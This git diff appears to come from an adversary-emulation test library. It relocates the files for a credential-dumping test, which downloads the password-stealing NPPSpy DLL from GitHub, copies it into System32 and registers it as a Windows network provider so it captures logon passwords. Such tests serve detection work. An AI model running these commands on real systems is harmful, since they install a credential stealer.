diff --git a/.gitignore b/.gitignore
index f922dab5..c86d1c76 100644
--- a/.gitignore
+++ b/.gitignore
@@ -57,4 +57,7 @@ override.tf.json
 .terraformrc
 terraform.rc
 
-*.pyc
\ No newline at end of file
+*.pyc
+
+# The ExternalPayloads folder
+ExternalPayloads
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 5d7c6fec..d9121d50 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -58,14 +58,15 @@ atomic_tests:
   - windows
   dependency_executor_name: powershell
   dependencies:
-  - description: NPPSpy.dll must be available in local temp directory
-    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
+  - description: NPPSpy.dll must be available in ExternalPayloads directory
+    prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
   executor:
     command: |-
-      Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
+      Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
       $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
       $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
       Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue